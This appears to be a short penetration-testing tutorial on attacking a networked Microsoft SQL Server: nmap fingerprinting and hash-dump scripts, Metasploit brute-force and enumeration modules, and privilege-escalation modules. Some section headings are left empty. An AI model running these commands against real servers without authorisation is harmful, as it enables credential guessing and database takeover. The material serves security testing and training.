How to Attack Windows SQL Server

Today I am writing about how to attack Windows SQL Server remotely. Sometimes when performing a penetration test we find some SQL servers exposed on the network here we will learn how to recognize the server, brute force it and escalate privileges.

How to Attack Windows SQL Server

Information Gathering

What port is SQL Server Running?

1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM

What version of SQL Server exists?

Scanning SQL Server

msf> use auxiliary/scanner/mssql/mssql_ping

Scanning SQL Server with Nmap

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

Default SQL Server Databases

master databaseRecords all the system-level information for an instance of SQL Server.
model databaseIs used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.
tempdb databaseIs a work-space for holding temporary objects or intermediate result sets.
resource databaseIs a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
msdb databaseIs used by SQL Server Agent for scheduling alerts and jobs.
SQL server default databases

SQL Server Type of Authentication

SQL Server Type of Users

Brute Force SQL Server

msfconsole script

Search useful Scripts

searchsploit "microsoft sql server"
nmap --script-help "*ms* and *sql*"
msf> search mssql
use auxiliary/scanner/mssql/mssql_login 
set rhosts 
set rport 1433 
set username fooadmin 
set password fooadmin 
set verbose true 
use auxiliary/admin/mssql/mssql_enum 
set rhosts 
set rport 1433 
set username fooadmin 
set password fooadmin 

Usefull wordlists

Escalate SQL Server Privileges

msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
msf> auxiliary/admin/mssql/mssql_escalate_execute_as